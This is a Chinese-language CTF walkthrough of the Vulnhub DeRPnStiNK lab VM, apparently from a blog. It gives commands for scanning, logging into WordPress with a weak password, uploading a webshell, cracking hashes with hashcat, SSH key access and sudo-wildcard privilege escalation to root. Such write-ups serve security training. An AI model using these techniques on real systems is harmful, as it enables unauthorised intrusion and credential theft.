Vulnhub:DeRPnStiNK渗透测试

老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx


Nmap scan report for xxx.xxx.xxx.xxx
Host is up (1.2s latency).
Not shown: 996 closed ports
PORTSTATESERVICE
21/tcpopenftp
22/tcpopenssh
80/tcpopenhttp
514/tcpfilteredshell

0xflag1

打开网页,访问端口80。查看源码,找到第一个flag。
flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

0xflag2

继续浏览网页源码,发现一个引用文件*/webnotes/info.txt*打开以后有一句话
@stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live,意思是要把映射域名。拿御剑扫一下。

ID地址HTTP响应
1xxx.xxx.xxx.xxx/robots.txt200
2xxx.xxx.xxx.xxx /weblog/301
3xxx.xxx.xxx.xxx/css301
4xxx.xxx.xxx.xxx/index.html200
5xxx.xxx.xxx.xxx/javascript301
6xxx.xxx.xxx.xxx/js301
7xxx.xxx.xxx.xxx/php301
8xxx.xxx.xxx.xxx/temporary/200

有一个xxx.xxx.xxx.xxx/weblog/,点击打开发现无法打开,并且网址变成http://derpnstink.local/weblog/

根据引用文件*/webnotes/info.txt*的提示,打开hosts文件最后一行加上xxx.xxx.xxx.xxx/derpnstink.local

再次打开http://derpnstink.local/weblog/,是一个wordpress博客的首页。管理员登陆网址是http://derpnstink.local/weblog/wp-login.php?loggedout=true,尝试弱口令登陆admin:admin,登陆成功。在管理员页面的发表文章上传一句话木马。用蚁剑连接,打开wp_config.php获取数据库用户名及密码root:mysql

打开xxx.xxx.xxx.xxx/php/phpmyadmin/,登陆数据库,在表wp_posts中找到第二个flag:
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

0xflag3

在数据库的wp_users表里找到的两个用户,用hashcat来破解。已知其中admin:admin。另一个账号unclestinky的密码是一串哈希值$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41。用hashcat工具来破译。在终端输入命令

root@kali:~# hashcat -a 0 -m 400 hash.txt fasttrack.txt --force --show

破解得到unclestinky:wedgie57,用账号登陆ftp服务器,登陆失败。

猜测账号错误,尝试stinky,登陆成功,打开以后找到地址ftp://xxx.xxx.xxx.xxx/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt下载密钥。

key.txt传入kali,终端输入ssh -i key.txt stinky@xxx.xxx.xxx.xxx,连接失败。

【错误提示】WORING:UNPROTECTED PRECVATE KEY FILE!

这里是说密钥文件权限不能为0777,0777权限太开放了,要求你的密钥文件不能被其它用户读取。
所以我们现在需要修改一下密钥文件权限。
在命令行输入chmod 700 key.txt即可。
再次连接,连接成功。

在桌面目录下找到第三个flag:

stinky@DeRPnStiNK:~Desktop/$ cat flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

###0xflag4

继续浏览其他目录,在documents文件夹下发现一个derpissues.pcap文件。

stinky@DeRPnStiNK:~Documents/$ ls
derpissues.pcap

在/ftp/files/network-logs路径下找到derpissues.txt

stinky@DeRPnStiNK:~/ftp/files/network-logs$ cat derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
 

大意再说mrderp的登不上账号,stinky帮他修改了密码。可能derpissues.pcap文件就是derpissues.txt之中内容的流量包,用wireshark打开分析,在一条post请求里找到mrderp的密码:derpderpderpderpderpderpderp。

切换终端用户,输入密码

stinky@DeRPnStiNK:/$ su mrderp
password:
mrderp@DeRPnStiNK:/$

切换成功。

在mrderp用户的文件夹中找到helpdesk.log。
内容中有一个网址https://pastebin.com/rzk9wfgw

打开以后显示文本框:
mrderp ALL=(ALL) /home/mrderp/binaries/derpy*

检查sudo -l

mrderp@DeRPnStiNK:~$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*

提示mrderp只有在/binaries/路径下文件名有derpy的文件可以使用sudo命令。
在这个目录创建derpy.sh并在里面写下/bin/bash。

mrderp@DeRPnStiNK:~/binaries$ echo "/bin/bash" >> derpy.sh
mrderp@DeRPnStiNK:~/binaries$ cat derpy.sh
/bin/bash

更改它的权限,并sudo执行,成功提权到root用户。

mrderp@DeRPnStiNK:~/binaries$ chmod 777 derpy.sh
mrderp@DeRPnStiNK:~/binaries$ ls
derpy.sh  derpysu
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# ls

在/root/desktop路径下找到最后一个flag:

root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
 
Congrats on rooting my first VulnOS!
 
Hit me up on twitter and let me know your thoughts!
 
@securekomodo
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

AtalantaDavis

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值